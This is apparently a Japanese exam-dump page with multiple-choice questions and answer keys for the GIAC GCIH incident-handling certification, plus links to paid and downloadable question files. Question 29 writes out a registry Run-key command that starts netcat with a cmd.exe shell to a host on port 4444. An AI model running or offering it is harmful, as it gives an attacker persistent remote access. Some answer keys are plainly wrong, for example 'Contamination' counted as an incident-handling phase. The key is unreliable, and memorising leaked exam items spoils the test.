
試験準備には欠かさないトップクラスのGIAC GCIH試験学習ガイド練習問題最新版
今すぐGCIH問題を使おうGCIH問題集PDFで合格しよう
質問 # 11
Which of the following types of attacks is targeting a Web server with multiple compromised
computers that are simultaneously sending hundreds of FIN packets with spoofed IP source IP
addresses?
- A. Dictionary attack
- B. Insertion attack
- C. DDoS attack
- D. Evasion attack
正解:C
質問 # 12
Adam works as an Incident Handler for Umbrella Inc. He is informed by the senior authorities that the server of the marketing department has been affected by a malicious hacking attack. Supervisors are also claiming that some sensitive data are also stolen.
Adam immediately arrived to the server room of the marketing department and identified the event as an incident. He isolated the infected network from the remaining part of the network and started preparing to image the entire system. He captures volatile data, such as running process, ram, and network connections.
Which of the following steps of the incident handling process is being performed by Adam?
- A. Eradication
- B. Containment
- C. Recovery
- D. Identification
正解:B
質問 # 13
Which of the following US Acts emphasized a "risk-based policy for cost-effective security" and makes mandatory for
agency program officials, chief information officers, and inspectors general (IGs) to conduct annual reviews of the
agency's information security program and report the results to Office of Management and Budget?
- A. Federal Information Security Management Act of 2002 (FISMA)
- B. The Electronic Communications Privacy Act of 1986 (ECPA)
- C. The Equal Credit Opportunity Act (ECOA)
- D. The Fair Credit Reporting Act (FCRA)
正解:A
質問 # 14
Who are the primary victims of smurf attacks on the contemporary Internet system?
- A. IRC servers are the primary victims to smurf attacks
- B. Mail servers are the primary victims to smurf attacks
- C. FTP servers are the primary victims to smurf attacks
- D. SMTP servers are the primary victims to smurf attacks
正解:A
質問 # 15
You work as a Network Administrator in the SecureTech Inc. The SecureTech Inc. is using Linux-based server.
Recently, you have updated the password policy of the company in which the server will disable passwords after four trials. What type of attack do you want to stop by enabling this policy?
- A. Replay
- B. XSS
- C. Cookie poisoning
- D. Brute force
正解:D
解説:
Section: Volume B
質問 # 16
Adam works as a Security Administrator for Umbrella Inc. A project has been assigned to him to secure access to the network of the company from all possible entry points. He segmented the network into several subnets and installed firewalls all over the network. He has placed very stringent rules on all the firewalls, blocking everything in and out except the ports that must be used. He does need to have port 80 open since his company hosts a website that must be accessed from the Internet. Adam is still worried about the programs like Hping2 that can get into a network through covert channels.
Which of the following is the most effective way to protect the network of the company from an attacker using Hping2 to scan his internal network?
- A. Block ICMP type 13 messages
- B. Block all outgoing traffic on port 21
- C. Block ICMP type 3 messages
- D. Block all outgoing traffic on port 53
正解:A
質問 # 17
Adam works as a Network Administrator for PassGuide Inc. He wants to prevent the network from DOS attacks. Which
of the following is most useful against DOS attacks?
- A. SPI
- B. Honey Pot
- C. Distributive firewall
- D. Internet bot
正解:A
質問 # 18
Which of the following options scans the networks for vulnerabilities regarding the security of a network?
- A. Network enumerators
- B. System enumerators
- C. Vulnerability enumerators
- D. Port enumerators
正解:A
質問 # 19
Which of the following is a technique of using a modem to automatically scan a list of telephone numbers, usually dialing every number in a local area code to search for computers, Bulletin board systems, and fax machines?
- A. Wardialing
- B. War driving
- C. Warkitting
- D. Demon dialing
正解:A
解説:
Section: Volume A
質問 # 20
You work as an Incident handling manager for a company. The public relations process of the company includes an event that responds to the e-mails queries. But since few days, it is identified that this process is providing a way to spammers to perform different types of e-mail attacks. Which of the following phases of the Incident handling process will now be involved in resolving this process and find a solution?
Each correct answer represents a part of the solution. Choose all that apply.
- A. Eradication
- B. Preparation
- C. Identification
- D. Contamination
- E. Recovery
正解:A、D、E
質問 # 21
Which of the following statements about reconnaissance is true?
- A. It is any program that allows a hacker to connect to a computer without going through the normal authentication process.
- B. It is also known as half-open scanning.
- C. It describes an attempt to transfer DNS zone data.
- D. It is a computer that is used to attract potential intruders or attackers.
正解:C
質問 # 22
Jason, a Malicious Hacker, is a student of Baker university. He wants to perform remote hacking on the server of DataSoft Inc. to hone his hacking skills. The company has a Windows-based network. Jason successfully enters the target system remotely by using the advantage of vulnerability. He places a Trojan to maintain future access and then disconnects the remote session. The employees of the company complain to Mark, who works as a Professional Ethical Hacker for DataSoft Inc., that some computers are very slow. Mark diagnoses the network and finds that some irrelevant log files and signs of Trojans are present on the computers. He suspects that a malicious hacker has accessed the network. Mark takes the help from Forensic Investigators and catches Jason.
Which of the following mistakes made by Jason helped the Forensic Investigators catch him?
- A. Jason did not perform port scanning.
- B. Jason did not perform foot printing.
- C. Jason did not perform covering tracks.
- D. Jason did not perform a vulnerability assessment.
- E. Jason did not perform OS fingerprinting.
正解:C
質問 # 23
Adam is a novice Web user. He chooses a 22 letters long word from the dictionary as his password.
How long will it take to crack the password by an attacker?
- A. 200 years
- B. 22 hours
- C. 5 minutes
- D. 23 days
正解:C
解説:
Section: Volume B
質問 # 24
Which of the following tools can be used for stress testing of a Web server?
Each correct answer represents a complete solution. Choose two.
- A. Spyware
- B. Anti-virus software
- C. Internet bots
- D. Scripts
正解:C、D
質問 # 25
Windump is a Windows port of the famous TCPDump packet sniffer available on a variety of platforms. In order to use this tool on the Windows platform a user must install a packet capture library.
What is the name of this library?
- A. WinPCap
- B. PCAP
- C. libpcap
- D. SysPCap
正解:A
解説:
Section: Volume C
質問 # 26
Which of the following commands is used to access Windows resources from Linux workstation?
- A. smbclient
- B. scp
- C. mutt
- D. rsync
正解:A
解説:
Section: Volume A
質問 # 27
Which of the following protocol loggers is used to detect ping sweep?
- A. dpsl
- B. pitl
- C. ippl
- D. lppi
正解:C
質問 # 28
John is a malicious attacker. He illegally accesses the server of We-are-secure Inc. He then places a backdoor in the We-are-secure server and alters its log files. Which of the following steps of malicious hacking includes altering the server log files?
- A. Covering tracks
- B. Reconnaissance
- C. Maintaining access
- D. Gaining access
正解:A
質問 # 29
You run the following command on the remote Windows server 2003 computer:
c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows
\nc.exe -d 192.168.1.7 4444 -e cmd.exe"
What task do you want to perform by running this command?
Each correct answer represents a complete solution. Choose all that apply.
- A. You want to put Netcat in the stealth mode.
- B. You want to perform banner grabbing.
- C. You want to add the Netcat command to the Windows registry.
- D. You want to set the Netcat to execute command any time.
正解:A、C、D
解説:
Section: Volume A
質問 # 30
Which of the following statements are true about tcp wrappers?
Each correct answer represents a complete solution. Choose all that apply.
- A. tcp wrapper protects a Linux server from IP address spoofing.
- B. tcp wrapper allows host or subnetwork IP addresses, names and/or ident query replies, to be used as tokens to filter for access control purposes.
- C. tcp wrapper provides access control, host address spoofing, client username lookups, etc.
- D. When a user uses a TCP wrapper, the inetd daemon runs the wrapper program tcpd instead of running the server program directly.
正解:B、C、D
質問 # 31
You see the career section of a company's Web site and analyze the job profile requirements. You conclude that the company wants professionals who have a sharp knowledge of Windows server 2003 and Windows active directory installation and placement. Which of the following steps are you using to perform hacking?
- A. Scanning
- B. Reconnaissance
- C. Covering tracks
- D. Gaining access
正解:B
質問 # 32
Victor wants to send an encrypted message to his friend. He is using certain steganography technique to accomplish this task. He takes a cover object and changes it accordingly to hide information. This secret information is recovered only when the algorithm compares the changed cover with the original cover.
Which of the following Steganography methods is Victor using to accomplish the task?
- A. The spread spectrum technique
- B. The cover generation technique
- C. The substitution technique
- D. The distortion technique
正解:D
質問 # 33
......
無料GIAC Information Security GCIH試験問題:https://jp.fast2test.com/GCIH-premium-file.html
問題集練習試験問題学習ガイドはGCIH試験で使える:https://drive.google.com/open?id=1plMe7KyHymq11ycUL9jUwIzLKFJQI6NH